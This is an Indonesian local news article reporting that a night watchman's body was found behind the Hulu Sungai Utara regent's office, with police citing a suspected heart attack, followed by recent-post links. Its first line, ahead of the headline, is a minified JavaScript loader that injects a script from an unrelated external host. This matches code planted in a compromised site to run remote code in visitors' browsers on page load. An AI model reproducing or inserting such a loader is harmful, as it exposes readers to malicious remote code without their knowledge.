(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Warga Amuntai Geger, Ada Mayat di Belakang Kantor Bupati HSU


AMUNTAI, Warga kota Amuntai, Kabupaten Hulu Sungai Utara (HSU) dibikin gempar, lantaran ditemukannya sesosok mayat yang tergeletak di belakang kantor Bupati HSU tepatnya berada di lokasi lahan parkir Bagian Humas dan Protokol Setda HSU, Kamis (6/6) malam.

Penemuan mayat yang diduga sebagai Abdul Basit (52), warga Kelurahan Kebun Sari RT 07 Kecamatan Amuntai Tengah yang bekerja sebagai wakar atau petugas jaga malam perkantoran Setda HSU itu pertama kali diketahui sekitar pukul 20.00 Wita oleh Fadlullah dan Basuki Rahmat.

Diketahui, Fadlullah (35) dan Basuki Rahmat (38) adalah PNS Setda HSU yang saat itu pulang dari Banjarmasin dan tiba di kantor Bupati HSU, kemudian berjalan ke belakang kantor bermaksud untuk mengambil sepeda motor yang terparkir di belakang kantor.

Namun tak berapa lama Fadlullah yang bermaksud mengambil sepeda motornya kaget, lantaran melihat sesosok orang tepatnya berada di lokasi parkir sepeda motor di belakang kantor Bagian Humas dan Protokol Setda HSU korban dalam keadaan terlentang. Di samping tubuh korban yang sudah tak bergerak ada pot bunga yang pecah.

Melihat kondisi korban demikian kemudian Fadlullah bersama Basuki bergegas melaporkan penemuan mayat tersebut ke Polres HSU.

“Pas pulang dalam kegiatan Open House Gubernur malam tadi, hendak mengambil sepeda motor kaget ada orang tertidur di atas lantai parkiran. Lalu saya panggil kawan lainnya, ternyata korban sudah meninggal,” ujar Fadlullah, PNS di Bagian Kesra Setda HSU tersebut.

Menerima laporan tersebut pihak Polres HSU langsung melakukan olah TKP, salah satunya dengan melakukan peninjauan kembali melalui CCTV di lokasi parkiran sepeda motor kantor Bupati HSU tersebut.

Sementara itu, Kapolres HSU AKBP Ahmad Arif Sopiyan SIK melalui Kapolsek Kota Amuntai Tengah Iptu Pol Taufik Suhardiman membenarkan adanya penemuan mayat di kawasan perkantoran Pemkab HSU tepatnya di parkir dekat bagian Humas dan Protokoler.

“Dari hasil visum diduga korban mengalami serangan jantung,” katanya

Adapun ciri ditemukan saat visum yakni, bibir pucat, tangan pucat. sementara untuk bukti luka atau lebam  tidak ditemukan,” tandasnya. (dew)

Reporter : Dew
Editor : Chell

Desy Arfianty

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

41 menit ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

1 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

1 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

2 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

2 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

2 jam ago

This website uses cookies.